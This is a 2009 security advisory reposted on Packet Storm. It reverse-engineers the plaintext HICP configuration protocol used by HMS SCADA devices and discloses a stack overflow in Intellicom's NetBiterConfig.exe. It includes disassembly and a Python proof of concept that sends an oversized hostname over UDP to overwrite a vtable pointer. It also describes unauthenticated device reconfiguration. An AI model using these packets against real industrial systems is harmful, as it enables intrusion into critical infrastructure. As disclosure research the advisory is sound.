what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HMS HICP Modification / Intellicom NetBiterConfing.exe Stack Overflow

HMS HICP Modification / Intellicom NetBiterConfing.exe Stack Overflow
Posted Dec 15, 2009
Authored by Ruben Santamarta | Site reversemode.com

This advisory documents vulnerabilities in the HMS HICP protocol as well as an Intellicom NetBiterConfing.exe remote stack overflow vulnerability. Proof of concept code included.

tags | exploit, remote, overflow, vulnerability, protocol, proof of concept
SHA-256 | 568bd797eaf1f7ed214afde142e6f10f82177d14ce3e3f83f9c7be7f09b32e90

HMS HICP Modification / Intellicom NetBiterConfing.exe Stack Overflow

Change Mirror Download
-----
More info
http://reversemode.com/index.php?option=com_content&task=view&id=65&Itemid=1
-----

1st PART "HMS HICP Protocol"

AFAIK there is no public documentation about this protocol, if not so
please let me know and I'll repeatedly hit myself with a sharpened
stick.All the information presented here has been obviously obtained by
reverse engineering.

Despite of the fact that this protocol is not complex,I think it has a
potential interest regarding SCADA security.You'll see why.
HICP, is intented to configure HMS's products that include ethernet/
capabilities, since they need a method for configuring Internal
IP,DCHP,NetworkMask,DNS,gateway.... In 2004 HMS released a free tool
named "Anybus IPconfig" which can be used to scan a network where the
devices are connected, then proceeding to configure them. The components
of this application are a simple MFC based GUI and a dll (hicp.dll). So
let's take a look at the exports:


Code (asm)
.text:100027AF ; int __cdecl HICP_SendModuleScan()
.text:100027AF public ?HICP_SendModuleScan@@YAHXZ
.text:100027AF ?HICP_SendModuleScan@@YAHXZ proc near
.text:100027AF push ebp
.text:100027B0 mov ebp, esp
.text:100027B2 call sub_10002175
.text:100027B7 pop ebp
.text:100027B8 retn
.text:100027B8 ?HICP_SendModuleScan@@YAHXZ endp


In C

Code (c)
sprintf(&Dest, "Module Scan");
to.sa_family = AF_INET;
*(_WORD *)&to.sa_data[0] = htons(HICP_PORT); // 3250 UDP
*(_DWORD *)&to.sa_data[2] = htonl(IP_BROADCAST);
v1 = strlen(&Dest);
if ( sendto(s, &Dest, v1 + 1, 0, &to, 16) != -1 )

So we can see that in order to scan the network, this tool sends a
broadcast UDP packet containing the string "Module Scan" to the HICP
port (3250). Inside HMS-AnyBus based devices we can find a hicp daemon
listening on port 3250. Once the device receives that packet it
broadcasts a reply, which contains its current configuration, to the
network on port 3250. The configure Tool listens on this port as well.
Let's see what parameters can be configured via this protocol.

Any value after the '=' can be modified.

+“Protocol version = 1.10; ” # Obvious
+”fb type = EVIL-DEVICE; ” # Device Type
+”module version = 0.66.6; ” # ...
+”mac = 00-30-11-00-CA-FE; ” # MAC
+”ip = 192.168.1.252; ” # ...
+”sn = 255.255.255.0; ” # Network Mask
+”gw = 192.168.1.1; ” # Gateway
+”dhcp = off; ” # whether the device is using a DHCP server for
obtaining the IP address. (on/off)
+”pswd = off; ” # whether the device is using a PASSWORD(on/off)
+”hn = morroBufalo; ” # hostname (optional)
+”dns1 = 192.168.1.33; ” # Primary DNS
+”dns2 = 192.168.1.34; ” # Secondary DNS (optional)
+”password = admin; ” # old password (if any, admin by default)
+”new password = fatbird; ” # new password

These parameters are sent in a UDP packet in plain text, concatenating
each one and separated by a ";".

If you want to configure a device, you need to prepend a "Configure:"
string in this wayt: "Configure: xx-xx-xx-xx-xx-xx;"+ parameters_string.
Where xx-xx-xx-xx-xx-xx is the MAC of the device you want to configure.
You can take a look at HICP_SendConfigure code to verity it. This
request is broadcasted so is received by any device/machine in the
network listening on 3250/UDP. The device checks the MAC against it own
and if matches then proceeds to update its internal registers.The first
three bytes of the MAC are always 00-30-11 which correspond to the HMS'
oui as expected.

In addition to this request, there are a couple of additional replyes
implemented:

+ "Invalid Password:" to indicate a failed configuration attempt
+ "Reconfigured:" to indicate success.


That's all. Make your own conclusions about the security level of this
protocol.I'm just presenting facts.

----------------

2nd Part "Intellicom NetBiterConfing.exe Remote Stack Overwrite". Oday
Light.

Another swedish company this time, Intellicom develops a serie of SCADA
products/devices named NetBiter WebSCADA which are based on HMS AnyBus
RemoteCOM device.
We can download the firmware, as well as two tools to configure and
update these devices respectively.Free goods are always nice.
First off, taking a look at the GUI of the tool for configuring devices,
NetBiterConfig.exe, we can see that looks pretty similar to the HMS
one.Except for a couple of added buttons, one to "wink" a device and the
other is to start an "emergency" DHCP server, the tools contains the
same components: hicp.dll and a MFC GUI. However, this one contains a
surprise.
Ok, NetBiterConfig.exe is listening on 3250/UDP receiving packets for
any interface, so we can send a specially crafted UDP packet from
outside the network to trick the tool into thinking we are a NetBiter
device.



If we fill "hn" parameter (HostName) with more than 0x20 bytes, we can
start to overwrite data in the stack. By constructing a hostname of 0x60
bytes we can overwrite a pointer to an vtable of application's
subclassing methods, this can be used to achieve code execution by
emulating a vtable under our control. 0x60 is not an arbitrary value, it
allows us to get %esi pointing to the last 0x20 (approximately) bytes of
our shellcode. The flaw is triggered when the admin double-clicks in the
list box item.

The flaw is a classic strcpy without proper bounds checking in
NetBiterConfig.exe

Code (asm)
.text:00403E52 lea edx, [ebp-0ABh]
.text:00403E58 push edx ; evil hostname
.text:00403E59 lea eax, [ebp-3CCh]
.text:00403E5F push eax
.text:00403E60 call strcpy


The flaw does not exist in AnybusIpconfig.exe since it uses "strncpy":


Code (asm)
.text:00403691 push 80h
.text:00403696 lea eax, [esp+0E1h]
.text:0040369D push eax
.text:0040369E lea ecx, [esp+494h]
.text:004036A5 push 80h
.text:004036AA push ecx
.text:004036AB mov byte ptr [esp+530h], 1
.text:004036B3 call sub_425666
….
….
.text:004256D9 mov cl, [edx]
.text:004256DB mov [eax], cl
.text:004256DD inc eax
.text:004256DE inc edx
.text:004256DF cmp cl, bl
.text:004256E1 jz short loc_4256EB
.text:004256E3 dec edi
.text:004256E4 jz short loc_4256EB
.text:004256E6 dec [ebp+arg_C]
.text:004256E9 jnz short loc_4256D9

--------

PoC

Code (python)
#!/usr/bin/python

# Intellicom NetBiterConfig.exe 1.3.0 Remote Buffer Overflow.
# Ruben Santamarta - www.reversemode.com
# For research purposes ONLY.


import sys
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("10.10.10.10",3250))
s.send("protocol version = 1.10; "
+"fb type = EVIL-DEVICE; "
+"module version = 0.66.6; "
+"mac = 00-30-11-00-BA-CA; "
+"ip = 192.168.1.52; "
+"sn = 255.255.255.0; "
+"gw = 192.168.1.1; "
+"dhcp = off; "
+"pswd = off; "
+"hn = "+"A"*0×60+"; "
+"dns1 = 192.168.1.33;")




Another interesting thing is that you can download the firmware for
free. The firmware is a .bin file that is comprised of a 0x5F bytes
header, which includes a magic
'NBU'+MajorMinorVersion+ImageSize+Checksum+VersionString, followed by a
simple gz file so if we cut off the header we can decompress the
remaining gz file. Cool. The firmware is a custom linux for
MotorolaColdFire processor. It contains interesting stuff like hardcoded
passwords...


Regards,
Rubén.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close